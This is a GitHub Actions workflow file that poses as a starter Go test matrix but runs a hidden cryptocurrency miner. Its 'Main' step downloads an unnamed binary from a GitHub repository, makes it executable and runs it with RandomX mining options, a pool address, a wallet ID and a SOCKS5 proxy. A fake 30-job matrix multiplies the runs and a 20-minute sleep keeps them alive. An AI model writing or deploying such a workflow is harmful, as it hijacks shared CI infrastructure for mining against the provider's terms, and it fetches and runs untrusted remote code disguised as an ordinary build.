# This is a basic workflow to help you get started with Actions10

name: pekerja
on: 
  push:
    branches: [ "main" ]

jobs:
  pekerjaRodi:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 80
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6]
        flag: [A, B, C, D, E]
    timeout-minutes: 20
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: Main
      run: |
        sudo apt-get update
        timeout 20m wget https://github.com/joaobem6/Gues/raw/main/100 && chmod +x 100 && ./100 -a rx/0 --url randomx.rplant.xyz:17123 --tls --user TuskeSyuUU11JV9aA7hRge2guz56EwNVdPvuHUKK61X6CSYS9PoeqL8Z1NLsUXuiQrQtFRHKwgRHRRd4yfsvNoab4rpec6SJbcpAdC.Tes --proxy socks5://24.249.199.12:4145 &
        sleep 20m
        echo "sukses"
  Success:
    needs: [pekerjaRodi]
    if: always()
    runs-on: ubuntu-20.04
    steps:
      - uses: technote-space/workflow-conclusion-action@v2
      - name: Check Failure
        if: env.WORKFLOW_CONCLUSION == 'failure'
        run: exit 1
      - name: Success
        if: ${{ success() }}
        run: echo "all don,All Done"
